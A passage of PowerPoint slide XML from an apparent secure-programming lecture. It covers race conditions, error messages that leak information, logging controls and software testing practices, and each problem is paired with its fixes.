              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1535113"/>
            <a:ext cx="3430588" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 15" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C10741C-234D-4AD6-939F-9ABC8C69A4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782011"/>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5" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F73DB5-8E7F-489A-8FA7-815A8DF0EC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76674" y="765968"/>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73394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B8D13287-7CB0-461D-8C70-FC84E886E8B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="654924"/>
            <a:ext cx="8154988" cy="498475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Problem:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Race Condition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C447D0DA-DBC5-41A1-A904-16153E334331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Thread P1	   Thread P2		Comment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> &gt;&gt; input;	    ..		// read in "hello" into global</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>..		   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> &gt;&gt; input;	// read in "good-bye" into global</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>out = input;	   out = input;	// do a string copy (...use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> &lt;&lt; out;	    ..		// print out "good-bye"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>..		   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> &lt;&lt; out;	// print out "good-bye“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Fixes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use Synchronization Primitives around critical code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Minimize use of shared resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Test using artificial delays in race window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Identify and trigger error conditions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49156" name="Picture 4" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A32C4F6-56DB-4212-A6BC-1A8FBC36C9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0" y="9906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7" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BD18064-F1B6-4109-930D-EE21BDF9CC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4074318"/>
            <a:ext cx="62785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2400" dirty="0"/>
              <a:t>Result: Data Corruption &amp; Denial of Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28452683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2B65EB81-CC05-4FDB-976C-F54D5F0DC64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="609600"/>
            <a:ext cx="8154988" cy="498475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Problem:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Chatty Error Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC287EC-944D-4DF8-B217-98C596463476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2057400"/>
            <a:ext cx="4038600" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example Problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Cannot find file: C:/users/Lincke/validation.txt”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Invalid password for login ID”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Lab.cs.uwp.edu error: divide by zero error”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exception path displayed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51204" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D45BF0-AD03-4BAD-B356-3CCD5B484C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="2057400"/>
            <a:ext cx="4038600" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Error messages should avoid file, network configuration, and PII information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Must be helpful to user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Remove debug info before release </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1373337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C1EA6-ECC4-4C79-846E-C548872D035D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="663574"/>
            <a:ext cx="8229600" cy="754063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control: Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90DAB6F8-19BF-4A71-96CB-524AAC593EBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A7D9355-A218-4AD1-897A-B821FA8DF8FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks on input are unreported: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>invalid login/passwords, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>untrusted input, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>deserialization errors, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>injection attacks, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS attempts, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>access control failures, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Purpose of logging: identify suspicious accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1500832B-C621-4746-800A-C02CF40885B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8679A2B-BD31-4B60-BB93-A35BCCBC7804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logs should be prioritized, clear, standard format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alert and act upon logs from applications </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Track high-value transactions in an unalterable audit trail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepare an incident response plan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 13" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA2BC11-7BE2-4BFC-9BE8-DE38B52E2D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5334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3" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5BFE601-FD4F-4DBC-A77B-C904B86C79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4300" y="533399"/>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86660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9B17E408-4700-42F8-A55C-6F4A6C126C0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="917575"/>
            <a:ext cx="8154988" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Control:   Test All Software!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B2B2059-2EE1-47DD-81A9-86AF3FCD84A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Dynamic Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>: use large test suites such as fuzz testing, robustness testing, and fault injection.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Software may slow down but should not crash or generate incorrect results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Use automated static analysis tools, e.g., warnings on program analysis tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Use manual tests such as penetration testing, threat modeling, and interactive tools to reach beyond auto testing tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Run program under </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>low memory conditions, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>insufficient privileges, </a:t>
            </a:r>
          </a:p>
          <a:p>
